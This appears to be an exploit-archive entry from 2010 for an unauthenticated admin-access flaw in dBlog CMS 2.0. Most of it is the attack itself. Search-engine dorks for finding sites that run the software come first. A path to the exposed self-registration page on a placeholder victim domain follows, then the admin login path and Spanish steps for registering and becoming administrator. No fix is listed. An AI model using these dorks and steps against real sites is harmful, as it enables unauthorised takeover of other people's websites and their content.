dBlog CMS v2.0 Remote Arbitrary Admin Access Vulnerability

2010-06-07 14:01:59

# Title:dBlog 2.0 CMS Open Source - Administrador Panel
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PoisonCode
# Published: 2010-06-02
# Download Exploit Code
# Download Vulnerable app
# Title: dBlog CMS- Open Source Administrado Panel
# Software:http://www.dblog.it/sito/gateway.asp?f=dblog_v20f.zip
# Version: 2.0
# Platform: asp
# Author: PoisonCode
# CVE-ID:()

_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/

PanamaSecurity.blogspot.com


Dorks

intext: "powered by dBlog CMS"
allinurl: /dblog/admin/articoli_elenco.asp

Exploit: www.victima.com/dblog/autoregistrazione/autori_aggiungi.asp

Panel:/dblog/admin/login.asp

Entramos al panel de administracion

LLenar los Datos y Darle en Aceptar

Entramos al Panel y nos Logeamos y listo ya somos admin

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.